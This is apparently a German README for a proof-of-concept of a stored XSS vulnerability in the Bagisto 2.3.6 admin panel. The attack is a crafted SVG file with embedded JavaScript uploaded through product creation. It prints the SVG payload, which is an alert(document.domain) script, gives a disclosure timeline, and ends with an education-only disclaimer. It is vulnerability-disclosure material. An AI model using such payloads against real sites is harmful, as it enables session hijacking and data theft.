
Proof-of-concept für eine gespeicherte XSS-Schwachstelle im Bagisto-Adminpanel, die den SVG-Upload mit schädlichem JavaScript demonstriert und Empfehlungen zur Abschwächung bereitstellt.
Eine authentifizierte Stored-XSS-Schwachstelle besteht im Produkterstellungspfad des Bagisto-2.3.6-Admin-Panels, die es einem Angreifer ermöglicht, eine manipulierte SVG-Datei mit bösartigem JavaScript-Code hochzuladen. Diese Schwachstelle kann von einem authentifizierten Admin-Benutzer ausgenutzt werden, um beliebiges JavaScript im Browser auszuführen, was möglicherweise zu Session-Hijacking, Datendiebstahl oder unbefugten Aktionen führen kann.
Die Schwachstelle wird ausgenutzt, wenn ein authentifizierter Administrator eine manipulierte SVG-Datei mit bösartigem JavaScript hochlädt.
Schritte zur Reproduktion:
Beispiel für einen bösartigen SVG-Payload:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
| Datum | Aktion |
|---|---|
| 2025 AUG | Schwachstelle entdeckt |
| 2025 AUG | Verantwortungsvolle Offenlegung |
| 2025 AUG | CVE-ID bei MITRE beantragt |
| 2025 OCT | CVE zugewiesen, öffentliche Offenlegung |
Die in diesem Repository bereitgestellten Informationen und Proof-of-Concept- (PoC-) Codes dienen ausschließlich Bildungs- und ethischen Forschungszwecken. Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder Schaden, der durch die hierin bereitgestellten Informationen oder Codes verursacht wird. Der Benutzer übernimmt die volle Verantwortung für seine Handlungen. Es liegt in der Verantwortung des Benutzers, sicherzustellen, dass er alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einhält.